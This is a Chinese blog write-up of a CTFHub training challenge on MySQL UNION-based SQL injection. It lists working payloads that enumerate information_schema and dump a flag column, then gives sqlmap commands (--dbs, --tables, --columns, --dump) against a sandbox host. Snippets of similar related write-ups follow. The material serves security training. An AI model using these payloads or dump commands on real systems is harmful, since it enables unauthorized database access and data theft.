CTFHUB-技能树-Web题-SQL注入-Mysql结构

原创 已于 2024-05-09 21:14:20 修改 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #mysql #数据库

于 2024-04-04 22:20:58 首次发布
本文详细介绍了SQL注入攻击在Web环境中的应用,包括如何利用Mysql结构判断注入、爆库、爆表、爆字段和爆数据的方法,以及如何使用sqlmap工具进行自动化操作。此外,还分享了sqlmap提示选项的使用技巧。

技能树-Web题-SQL注入-Mysql结构

文章目录

Mysql结构
判断注入

1 and 1=1 有回显

1 and 1=2 无回显

爆库
-1 union select 1,database()#

在这里插入图片描述
得到库名sqli

爆表
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'

在这里插入图片描述
得到两个表名,爆第一个表的字段名看看有什么信息

爆字段
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'djzvzdauvl'

在这里插入图片描述
得到一个字段名,看看有什么数据

爆数据
-1 union select 1,yireieotdp from sqli.djzvzdauvl

在这里插入图片描述
得到flag

linux sqlmap
爆库
sqlmap -u challenge-dd6c3391b9ccd2b7.sandbox.ctfhub.com:10800/?id=1 --dbs

在这里插入图片描述

爆表
sqlmap -u challenge-dd6c3391b9ccd2b7.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

在这里插入图片描述

爆字段
sqlmap -u challenge-dd6c3391b9ccd2b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T djzvzdauvl --columns

在这里插入图片描述

爆数据
sqlmap -u challenge-dd6c3391b9ccd2b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T djzvzdauvl -C yireieotdp --dump

在这里插入图片描述

sqlmap提示选项使用技巧

在使用sqlmap过程中,经常需要用户进行选择,如[Y/n]。这里有几个技巧:

1.大写的为默认选项。如果不输入,就自动使用该选项。
2.我们输入时,不用区分大小写。
3.除了y和n,还有两个特殊选项。一个是a,表示alway,就是总是获取。一个是q,表示退出。
4.不想手动选择,则在执行sqlmap的时候,加上–batch和–smart选项。

CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 648
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2652
数据库注入
CTFHub | MySQL结构
尼泊罗河伯的博客
11-13 2337
根据网页显示内容输入1进行测试,此可能存在 SQL 注入。此与前一类似,这次使用手工注入。先判断是否存在注入,发现存在注入后检查注入点。判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看全部数据库名,并查看这些数据库的表名,最后在lvlbiqemvj 表中的数据发现此 flag 。
CTFHub-web(MySQL结构)
分享与记录
08-21 3109
1. 输入一个1,发现有两个注入点 2. 验证这两个注入点 0 union select 1,2 3. 从注入点得到数据库信息和数据库版本 0 union select database(),version() 4. 查询sqli数据库中的表 0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' 5. 查询表中的字段 0 union select
CTFHub SQL注入通关笔记6:MySQL结构(手注法+脚本法)
最新发布
mooyuan的网络安全博客
10-08 838
本文通过两种方法(手注法+脚本法)对“CTFHub平台 SQL注入-MySQL结构”关卡进行渗透实战。首先介绍了MySQL系统数据库(information_schema、mysql、performance_schema)在注入攻击中的关键作用,以及常用内置函数(database()、version()等)。然后分步骤演示了手工注入方法:从识别注入点、确定列数、定位回显位,到获取数据库名、表名和字段名,最终提取目标数据。文章同样使用sqlmap工具自动化完成注入的完整流程,系统讲解参数的设置并对结果进行分。
# CTFhub MySQL结构
plant1234的博客
06-18 816
MySQL结构: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata
CTFHub技能树WEB MYSQL结构
weixin_48799157的博客
03-20 1597
小白一个,如有错误请指正! 解法一: 1.这里还是老方法,输入 1, 2 ,3 ,得知字段有两个 2.爆数据库 select * from news where id=123 union select 1,database()# 3.爆表名 select * from news where id=123 union select 1,group_concat(table_name) from information_schema.tables where table_schema..
CTFHub-MYSQL结构-wp
z1moq的博客
05-16 259
MySQL结构注入条件进行测试 输入 1 时正常返回 输入 1’ 时无法正常返回 输入 1+1 时正常返回 id=2 的值 说明存在整数型SQL注入 使用 order by 检查字段数 字段数为 2 使用 1 union select 1,2,3 检查输出字段数 与order by 得出的结果相同 -1 union select 1,database() #得出表名:sqli -1 union select 1,group_concat(table_name) from informa
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7977
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1065
CTFHUB SQL
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 1039
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHub技能树web(持续更新)--SQL注入--MySQL结构
jiuyongpinyin的博客
09-05 946
MySQL结构 首先结果测试是可以使用联合查询语句的,前文中有提到过如何手工注入,这里就直接使用sqlmap进行注入 爆破当前数据库: 得到当前数据库: 爆破当前数据库的表名: 得到表名: 这里和之前不一样了,没有类似的flag的表名,但是有一个sappimemcd这个没见过的,爆破这个表名的列试试: 得到列名: 接着我们爆破里面的字段: 得到flag: 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
CTFHUB技能树SQL——MySQL结构
weixin_73049307的博客
10-17 1499
1 and 1=2 union select 1,2#或者-1 union select 1,2#都行。没有发现数据,猜测数据可能不存在数据库中,修改注入语句。知道字段数量为2后,可以查看数据库位置。可以发现sqli不是自带的数据库。回显错误,说明是整数型注入。回显错误,说明字段数是2列。
CTFHUB-技能树-Web-SQL注入-Mysql结构-Cookie注入
Static______的博客
04-05 930
这里其实可以将数据包放入重放器中进行。得到两个表名,查看第一个表的字段。输入1 and 1=1 有回显。输入1 and 1=2 无回显。由此判断可回显字段为1,2字段。
CTFHUB-SQL注入-MySQL结构
u014794539的博客
07-10 551
考点 MySQL数据库结构 数据库1 = 网站1 表明 列名 数据 数据库2 … 数据库3 … 分析过程 ?id=1 and 1=1 ?id=1 and 1=2 ?id=1' and1=1# 上句执行了下两句未执行 存在注入 查字段 1 order by 1 1 order by 2 1 order by 3 2执行 3不执行了 两个字段 查看当前数据库 233 union select 1,database() 库名还是sqli,看表 233 union select 1,grou
MySQL结构、Cookie注入、UA注入、Refer注入ctfhub
2401_82985722的博客
04-01 1160
User-Agent是Http协议中的一部分,属于头域的组成部分,(简称UA)。是一种向访问网站提供你所使用的浏览器类型、
SQL使用工具sqlmap注入CTFHubmysql结构
zguohuai的博客
05-10 397
使用sqlmap进行数据注入
mysql结构ctfhub-sql注入
qq_26245471的博客
01-08 737
ctfhub sql注入mysql结构
PHP在CTF-Web挑战中的实战应用技巧
和描述中提到的知识点是关于在Web环境中使用PHP编程语言进行CTF(Capture The Flag)挑战的介绍。...在CTF-Web-Challenge的环境中,参赛者将有机会通过实战演练这些技术,提升自己的安全技能。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值